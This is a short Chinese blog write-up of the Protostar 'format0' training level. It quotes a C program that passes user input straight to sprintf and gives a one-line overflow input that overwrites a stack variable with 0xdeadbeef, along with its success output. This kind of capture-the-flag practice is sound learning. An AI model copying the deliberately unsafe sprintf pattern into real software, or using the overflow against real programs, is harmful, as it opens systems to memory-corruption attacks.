Protostar format0

发布时间：2020-08-16 08:49:23 来源：网络阅读：485 作者：terrying 栏目：安全技术

About

This level introduces format strings, and how attacker supplied format strings can modify the execution flow of programs.

Hints:

This level should be done in less than 10 bytes of input.
"Exploiting format string vulnerabilities"

This level is at /opt/protostar/bin/format0

#include <stdlib.h%gt;
#include <unistd.h%gt;
#include <stdio.h%gt;
#include <string.h%gt;

void vuln(char *string)
{
volatile int target;
char buffer[64];

target = 0;

sprintf(buffer, string);

if(target == 0xdeadbeef) {
printf("you have hit the target correctly :)\n");
}
}

int main(int argc, char **argv)
{
vuln(argv[1]);
}

格式化字符串热身题，只需要将target部分覆盖也\xdeadbeef即可。因为在定义时，target和buffer是连着的，因此在内存的位置也是一起的。故可得：

user@protostar:/opt/protostar/bin$ ./format0 $(python -c 'print "a"*64+"\xef\xbe\xad\xde"')
you have hit the target correctly :)

向AI问一下细节

Protostar format0

About

猜你喜欢

最新资讯

相关推荐

相关标签